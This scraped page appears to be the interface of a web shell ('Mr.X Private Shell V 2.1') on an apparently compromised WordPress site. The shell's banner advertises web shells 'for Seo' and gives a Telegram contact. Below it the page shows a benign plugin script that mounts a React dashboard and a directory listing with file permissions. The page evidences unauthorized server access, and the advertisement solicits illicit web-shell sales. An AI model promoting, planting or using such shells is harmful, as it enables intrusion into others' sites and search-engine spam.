__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
import { createElement, createRoot } from '@wordpress/element'
import Dashboard from './Dashboard'
document.addEventListener('DOMContentLoaded', () => {
if (!ctDashboardLocalizations.plugin_data) {
return
}
if (document.getElementById('ct-dashboard')) {
const root = createRoot(document.getElementById('ct-dashboard'))
root.render(<Dashboard />)
}
})
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| components | Folder | 0750 |
|
|
| screens | Folder | 0750 |
|
|
| Dashboard.js | File | 2.85 KB | 0640 |
|
| Heading.js | File | 1.55 KB | 0640 |
|
| Navigation.js | File | 2.65 KB | 0640 |
|
| context.js | File | 333 B | 0640 |
|
| main.js | File | 363 B | 0640 |
|